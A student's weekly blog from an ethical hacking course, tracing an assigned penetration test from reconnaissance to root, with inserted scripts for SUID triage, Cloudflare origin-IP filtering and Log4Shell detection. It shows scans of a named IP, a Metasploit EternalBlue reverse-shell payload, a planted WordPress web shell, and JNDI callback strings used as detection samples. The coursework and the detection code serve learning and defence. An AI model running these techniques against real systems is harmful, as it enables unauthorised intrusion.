Posts

Showing posts from June, 2025

Final Reflection

Week 13 was dedicated to presenting our final project. Each team delivered a short presentation summarizing their ethical hacking engagement, from reconnaissance to exploitation, based on their submitted report.

Final Thoughts & Reflection

When I first enrolled in this course, I saw ethical hacking as just another requirement in my academic program, something to get through. But over the weeks, especially after the hands-on labs and final penetration test, my view changed completely. This course turned out to be one of the most engaging and eye-opening parts of my study so far. Learning how systems can be tested, broken, and hardened was fascinating. It taught me not only technical skills, but also how attackers think, and how defenders must think smarter. Now, cybersecurity is something I'm seriously considering for my future career. It's exciting, fast-paced, and more impactful than I expected. Honestly, it made choosing a career path even harder, in a good way.

Week 12

After weeks of preparation, our team successfully gained unauthorized access to the WordPress admin panel on server1.pentest.id, marking a major milestone in our simulated black-box penetration test.

Breaking In

Although earlier brute-force attempts failed, we eventually discovered a password hint left carelessly somewhere on the site. Using this, we bypassed authentication and logged in as the WordPress admin.

Privilege Escalation: From Admin to Root

Once inside the system, our goal shifted to escalating privileges and gaining full root access.

SUID Binary Enumeration

We executed a command to find all regular files with the SUID bit set:

find / -perm -4000 -type f 2>/dev/null

This revealed paths to root through misconfigured binaries like /dev/shm/rootbash and /tmp/rootbash, which could be exploited to run commands with elevated privileges.

Post-Exploitation: Backdoor Access

Using the Theme Editor in WordPress, we inserted a PHP web shell into the functions.php f...
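The find command above lists every setuid file, but the interesting part is deciding which ones matter: a setuid binary under /usr/bin is normal, while one sitting in /tmp or /dev/shm, directories any user can write to, is almost never legitimate and is exactly the kind of planted rootbash the post describes. The script below is an added example (not code from the post or the course) that does that triage. It walks a directory tree, treats the scan root as if it were /, and flags setuid files that live outside the expected system directories or whose parent directory is world-writable. The expected-directory list and the sample tree it builds are assumptions for the demonstration; point it at / on a real target.

```python
import os
import stat
import tempfile

# Where setuid binaries legitimately live on a typical Linux host
# (illustrative, not exhaustive; tune it for the target's distribution).
EXPECTED_SUID_DIRS = (
    "/bin", "/sbin", "/usr/bin", "/usr/sbin",
    "/usr/lib", "/usr/libexec", "/usr/local/bin", "/usr/local/sbin",
)


def _virtual_path(root, path):
    """Map a path inside `root` to what it would be if `root` were `/`,
    so a copied or mounted filesystem image can be scanned in place."""
    return "/" + os.path.relpath(path, root).replace(os.sep, "/")


def triage_suid(root="/", expected_dirs=EXPECTED_SUID_DIRS):
    """Return (virtual_path, reasons) for every regular file under `root` with the
    setuid bit set. An empty reasons list means it looks like a normal system binary."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entry; skip, don't abort the scan
            if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID):
                continue
            vpath = _virtual_path(root, path)
            reasons = []
            if not any(vpath.startswith(d.rstrip("/") + "/") for d in expected_dirs):
                reasons.append("outside expected setuid directories")
            if os.stat(dirpath).st_mode & stat.S_IWOTH:
                reasons.append("parent directory is world-writable")
            if st.st_uid == 0 and reasons:
                reasons.append("setuid-root: runs as root for any local user")
            results.append((vpath, reasons))
    return sorted(results)


def build_demo_tree():
    """Constructed sample filesystem for this example: a normal setuid binary under
    /usr/bin and a planted setuid shell copy under a world-writable /tmp."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.chmod(os.path.join(root, "usr"), 0o755)
    os.chmod(os.path.join(root, "usr", "bin"), 0o755)
    os.makedirs(os.path.join(root, "tmp"))
    os.chmod(os.path.join(root, "tmp"), 0o1777)      # sticky, world-writable like real /tmp
    for rel, mode in (("usr/bin/passwd", 0o4755),
                      ("tmp/rootbash", 0o4755),
                      ("tmp/notes.txt", 0o644)):
        p = os.path.join(root, rel)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)                            # setting setuid on your own file needs no root
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for vpath, reasons in triage_suid(demo_root):
        label = "SUSPICIOUS" if reasons else "ok"
        print(f"{label:10} {vpath}  {'; '.join(reasons)}")
```

On a real host run triage_suid("/") as the low-privilege user you landed as; anything flagged with both reasons is either a leftover from a previous attacker or a deliberately planted escalation path, and on a defended system the same two checks make a cheap periodic integrity alert.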

Week 11

This week, our team made initial progress in the final penetration testing project by successfully uncovering the real IP address of the target server, server1.pentest.id, which was originally hidden behind Cloudflare.

Real IP Discovery

Identified IP: 103.127.137.243
Method: We used Censys, a search engine for internet-connected assets. By digging through historical DNS records and SSL/TLS certificate data, we were able to trace the origin IP — a reminder that even reverse proxies like Cloudflare can be bypassed with the right tools and research.

Scanning & Enumeration Tools

Once we had the real IP, we began actively scanning the server to find potential vulnerabilities:

1. Nmap
Used for port and service discovery:

nmap -sV -Pn 103.127.137.243

This scan revealed multiple open services (e.g., web, FTP, SSH) that could be potential entry points.

2. Nikto
Scanned the web server for outdated software and known issues:

nikto -h http://103.127.137.243

3. FFUF ...
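Historical DNS and certificate searches return a pile of addresses, most of which are just Cloudflare edges. The first filtering step is to discard anything inside Cloudflare's published ranges and anything unroutable, then rank what is left by how many independent sources saw it. The code below is an added example (not the team's tooling and not a Censys client): the Cloudflare list is a snapshot of https://www.cloudflare.com/ips-v4 that must be re-fetched before an engagement, and the observations it consumes are constructed for the demonstration, using RFC 5737 documentation addresses as stand-ins for public IPs.

```python
import ipaddress

# Snapshot of Cloudflare's published IPv4 edge ranges (https://www.cloudflare.com/ips-v4).
# The list changes occasionally: re-fetch it before relying on it in an engagement.
CLOUDFLARE_V4 = [ipaddress.ip_network(c) for c in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Addresses that can never be an internet-facing origin (RFC 1918, loopback, link-local).
UNROUTABLE_V4 = [ipaddress.ip_network(c) for c in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def _in_any(addr, networks):
    return any(addr in net for net in networks)


def is_cloudflare(ip):
    """True if `ip` sits in a Cloudflare edge range, i.e. it is the proxy, not the origin."""
    return _in_any(ipaddress.ip_address(ip), CLOUDFLARE_V4)


def origin_candidates(observations):
    """observations: iterable of (source, ip) pairs gathered from passive DNS history,
    certificate searches (Censys, crt.sh), mail headers and similar.
    Returns [(ip, {sources...}), ...] for IPv4 addresses that are neither Cloudflare
    edges nor unroutable, most-corroborated first."""
    seen = {}
    for source, ip in observations:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue                                  # noise in the data, not an address
        if addr.version != 4 or _in_any(addr, CLOUDFLARE_V4) or _in_any(addr, UNROUTABLE_V4):
            continue
        seen.setdefault(str(addr), set()).add(source)
    return sorted(seen.items(), key=lambda kv: (-len(kv[1]), kv[0]))


# Constructed sample input (documentation addresses, not real findings).
SAMPLE_OBSERVATIONS = [
    ("dns-history-2024", "104.16.12.34"),    # current A record: a Cloudflare edge
    ("dns-history-2022", "203.0.113.17"),    # older A record from before Cloudflare was enabled
    ("crt-sh-2023", "203.0.113.17"),         # host presenting the site's certificate directly
    ("crt-sh-2023", "10.0.0.5"),             # internal address leaked in a SAN, unreachable
    ("mail-header", "not-an-ip"),            # noise
]

if __name__ == "__main__":
    for ip, sources in origin_candidates(SAMPLE_OBSERVATIONS):
        print(f"{ip}  seen by {len(sources)} source(s): {', '.join(sorted(sources))}")
```

A surviving candidate is still only a candidate: confirm it by requesting the site directly from that address with the real hostname, for example curl --resolve server1.pentest.id:443:203.0.113.17 https://server1.pentest.id/, and comparing the response with what the Cloudflare front end returns. The underlying weakness is not Cloudflare being "bypassed" but the origin accepting connections from anyone; the fix on the defending side is to allow only Cloudflare's ranges (or an authenticated origin pull) at the origin firewall.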

Week 10

Week 10 marked the start of our final project, where we'll apply everything we've learned so far in a real-world penetration testing scenario. The goal is to simulate a complete ethical hacking engagement over the course of four weeks.

Project Overview

Target: server1.pentest.id
Start Date: May 10, 10:00 AM
Challenge: The target is protected by Cloudflare, which masks its real IP address using a reverse proxy.

Project Tasks

Identify the real IP hidden behind Cloudflare.
Exploit vulnerabilities using known or custom techniques.
Gain root access through privilege escalation.
Document the entire process through:
A 10-minute executive presentation
A detailed technical report (DOCX)

Important rules:
No DoS/DDoS attacks
You may clear logs and plant backdoors
System configurations must not be altered or patched

Lecture Recap: Vulnerability Research & Exploitation

In addition to launching the project, this week's lecture revisited t...

Week 9

This week, we participated in a forum-style session that explored real-world exploitation techniques, categorized into remote execution and local privilege escalation. These attacks represent the next steps after reconnaissance and vulnerability mapping — actually compromising a system.

Category 1: Remote Code Execution (RCE)

Remote execution occurs when an attacker is able to run code on a system without physical access — usually by exploiting a vulnerable service over the network.

EternalBlue (CVE-2017-0144)
Previously discussed in Weeks 6 and 7, EternalBlue targets Microsoft's SMBv1 protocol. It allows attackers to gain full control over a system by sending crafted network packets to port 445. Once inside, malware like WannaCry or NotPetya can be deployed to spread or destroy.

Log4Shell (CVE-2021-44228)
A critical zero-day in Apache Log4j, a Java-based logging library. It allows attackers to perform remote code execution by injecting malicious input (e.g., into ...
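The Log4Shell payload is a JNDI lookup string such as ${jndi:ldap://attacker/x} placed in any field the application logs, and the attacker-side trick that defeated many first-day signatures was nesting Log4j's own lookups (${lower:j}, ${::-j}) so the literal word "jndi" never appears in the request. The script below is an added example (not code from the session) of a detection check that undoes those common nestings before matching. It runs over constructed access-log lines using RFC 5737 addresses; the normalization is a heuristic for the well-known obfuscations, not a full Log4j lookup evaluator.

```python
import re

# Innermost lookups attackers nest to hide "jndi" from naive string matching:
#   ${lower:j} / ${upper:J}  ->  j / J        ${::-j} / ${env:NOPE:-j}  ->  j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text):
    """Collapse nested lower/upper/default-value lookups until the string stops
    changing. Case lookups keep the literal character (the final match is
    case-insensitive anyway). Heuristic: covers the common obfuscations only."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_log4shell(lines):
    """Return (line_index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed web-server access-log lines (RFC 5737 test addresses). The
# User-Agent field is a favourite injection point because it is logged verbatim.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 "${${lower:j}ndi:rmi://198.51.100.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /x HTTP/1.1" 404 "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"',
]

if __name__ == "__main__":
    for idx, norm in find_log4shell(SAMPLE_LOG):
        print(f"line {idx}: {norm}")
```

Two things this shows that a plain grep for "jndi" does not: the third and fourth sample lines only become recognisable after the nested lookups are collapsed, and the callback host in the normalized line (198.51.100.7 here) is the indicator to pivot on in the rest of the logs.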

Week 8

The weakest link in an organization's security chain is the human. Some of the most damaging and well-known cyber attacks were not caused by weak technology or a flaw in the code, but by people. This week, we explored one of the most powerful and common forms of attack: social engineering. Rather than targeting software or hardware, these attacks exploit human behavior to gain unauthorized access or information.

Social Engineering Attack Process

We broke down the social engineering attack lifecycle into four main phases:
Intelligence Gathering – Researching the target through social media, company websites, or public records.
Identifying Vulnerabilities – Pinpointing weak spots in communication channels or personal behaviors.
Planning the Attack – Choosing a method, setting a goal, and crafting the approach.
Execution – Carrying out the deception, such as sending a phishing email or impersonating an employee.

Common Attack Techniques

We studied psychological ...

Week 7

Week 7 marked a shift from theory to hands-on practice. In a controlled lab environment, we simulated a real-world cyberattack by exploiting the EternalBlue vulnerability (CVE-2017-0144) using the Metasploit Framework (msfconsole).

Lab Setup

We launched Metasploit using the msfconsole command and loaded the EternalBlue exploit module:

use exploit/windows/smb/ms17_010_eternalblue

We configured the required parameters:
RHOSTS — the target machine's IP
LHOST — our own attacker machine's IP

To confirm the target was vulnerable, we scanned it using Nmap and verified that SMB (port 445) was open.

The default payload used was:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

This payload would establish a reverse shell, giving us remote access to the target system if the exploit was successful. Finally, we executed the attack with the exploit command. On success, we demonstrated control by creating a file with our name on the victim machine — proof of successful exploitat...

Week 6

Instead of a lecture this week, we participated in a forum discussion centered around EternalBlue, a critical cybersecurity vulnerability that had a massive global impact.

What is EternalBlue?

EternalBlue is a flaw in Microsoft's SMBv1 (Server Message Block) protocol, officially known as CVE-2017-0144. It allows attackers to remotely execute code on unpatched systems by exploiting a buffer overflow. Originally developed by the NSA, the exploit was leaked by a group called The Shadow Brokers in April 2017, about a month after Microsoft had already shipped the MS17-010 patch for it. This vulnerability became infamous as the driving force behind major ransomware attacks like WannaCry and NotPetya, which infected hundreds of thousands of machines worldwide.

How the Exploit Works

Scanning – Attackers use tools like Nmap to find systems with port 445 open and missing the MS17-010 patch.
Exploitation – A specially crafted SMB packet is sent, triggering a buffer overflow and allowing the attacker to gain full control of the system.
Payload Injection – Once inside,...

Week 5

This week, we moved beyond just identifying devices on a network and focused on enumeration — the process of actively extracting detailed information from systems. Enumeration is more invasive than basic scanning and reveals critical details that can be used in later stages of penetration testing.

What Is Enumeration?

Enumeration is about uncovering the "who" and "what" behind a system:
Usernames and groups
Shared folders and drives
Service banners and OS versions
Login history and known vulnerabilities

This detailed view gives ethical hackers the insights needed to plan further testing or attacks.

Focus on Windows Environments

We focused especially on Microsoft-based systems, where NetBIOS over TCP/IP (NBT) can leak a surprising amount of information — especially on older systems.

NetBIOS Tools Used:
nbtscan – Scans a network range for NetBIOS name information.
nbtstat – A built-in Windows command that shows NetBIOS name tables and the name cache.
net view – Lists shared resources on a host, or the hosts visible in a workgroup or domain.
...

Week 4

This week, we moved deeper into the reconnaissance phase of ethical hacking by focusing on target discovery and enumeration. Once initial information is gathered, the next step is to actively identify live systems, open ports, and services running on a target network.

What is Target Discovery?

Target discovery is the process of finding which systems within a network are active and reachable. It's the first active step where tools begin interacting with the target — which also increases the chances of being detected, so stealth is key. We looked at how Kali Linux provides built-in tools to perform this task efficiently and safely.

Tools and Techniques Covered

We explored several core concepts and tools:
OS Fingerprinting – Techniques used to determine the target machine's operating system by analyzing how it responds to certain network traffic.
TCP/IP and UDP Characteristics – Understanding how these protocols behave is crucial for crafting effective scans and interpreti...

Week 3

This week focused on how ethical hackers can use search engines and data harvesting tools to collect publicly available information, often called open-source intelligence (OSINT). These techniques are part of the early reconnaissance phase, where hackers gather as much intel as possible without directly interacting with the target systems.

Search Engine-Based Info Gathering

We learned that regular search engines like Google can be powerful tools in the hands of a skilled hacker. By using advanced search queries (often called Google Dorking), it's possible to uncover sensitive files, exposed directories, employee details, and more, all from sources that are already publicly accessible. In addition to traditional search engines, we explored information harvester engines, which are designed specifically to collect data from a wide range of public sources.

Tools We Explored

Several specialized tools were introduced this week:
TheHarvester – Collects emails, names, subdomains, and other data from...

Week 2

In the second week of ethical hacking, we explored the very beginning of the hacking process: understanding the target and gathering as much information as possible before any actual attacks or scans happen.

Target Scoping

Target scoping is all about setting boundaries. Ethical hackers need to know what systems or domains they're allowed to test and under what conditions. This ensures everything stays legal, ethical, and clearly defined before moving forward.

Information Gathering (Footprinting)

Once the scope is set, the next step is information gathering, often called footprinting. This involves collecting publicly available data about a target, usually without interacting directly with its systems. It's a passive but powerful way to learn about the target's digital presence.

Tools
Whois, Host, Dig.

Lessons learnt
How to gather public documents and online data about an organization.
The basics of DNS enumeration and how to use it to map out a target.
How to identify possi...

Week 1

Our first session introduced the foundations of ethical hacking, the legal practice of testing systems to find and fix security weaknesses before attackers do. Unlike malicious hackers, ethical hackers operate with permission and follow strict guidelines. This process is often referred to as penetration testing (pen testing).

Penetration Testing Models

We learned about three types of pen testing approaches:
White Box – Full knowledge of and access to the system is provided.
Black Box – No prior knowledge is given, simulating an external threat.
Gray Box – Partial system knowledge is shared.

These models help organizations understand their technical weaknesses and test how well their teams can respond to real threats.

Client Requirements & Business Goals

We also explored how pen testing must align with the client's objectives and business needs. It's not just about finding vulnerabilities, it's about understanding:
What the client wants to protect.
How security impacts bus...